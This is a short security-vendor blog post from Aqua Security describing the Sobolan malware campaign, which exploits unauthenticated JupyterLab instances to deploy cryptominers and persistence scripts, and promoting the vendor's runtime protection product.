← Back to Blog
Security ResearchMarch 10, 2025

Stopping Sobolan Malware with Aqua Runtime Protection

By Assaf Morag

Aqua Nautilus researchers have discovered a new attack campaign targeting interactive computing environments such as Jupyter Notebooks. The attack consists of multiple stages, beginning with the download of a compressed file from a remote server. Once executed, the attacker deploys several malicious tools to exploit the server and establish persistence.

This campaign poses a significant risk to cloud-native environments, as it enables unauthorized access and long-term control over compromised systems.

The Attacked Workload

Interactive Computing Environments or Notebook Interfaces are platforms designed for data scientists and programmers to write, execute, and analyze code interactively. These environments are often connected to the internet and require authentication to access data or execute code. However, a simple misconfiguration can sometimes expose the server to malicious activity by hackers.

Attack Flow

The attackers gained initial access through an unauthenticated JupyterLab instance, allowing them to deploy malware and cryptominers. They first downloaded and extracted a compressed archive containing 13 malicious files, consisting of both binaries and shell scripts. Once executed, these scripts initiated multiple processes to establish persistence, hijack system resources for cryptomining, and evade detection.

The attack follows these steps:

  • Initial Access: The attacker exploits an unauthenticated JupyterLab instance.
  • Download & Extraction: A compressed file (.tar) is downloaded and extracted, revealing 13 malicious files (7 binaries and 6 shell scripts).
  • Execution: The attacker runs a start script, which launches five additional binaries and shell scripts.
  • Persistence & Evasion: The scripts initiate processes to establish persistence, hijack system resources for cryptomining, and avoid detection.

How Aqua Detects and Blocks

Aqua's Runtime Protection effectively detects, blocks, and mitigates these threats by leveraging real-time threat intelligence, malware scanning, and customizable runtime policies. Organizations using Aqua can proactively secure their environments against such attacks, ensuring operational integrity and preventing unauthorized access.

Read Full Article on Aqua Security →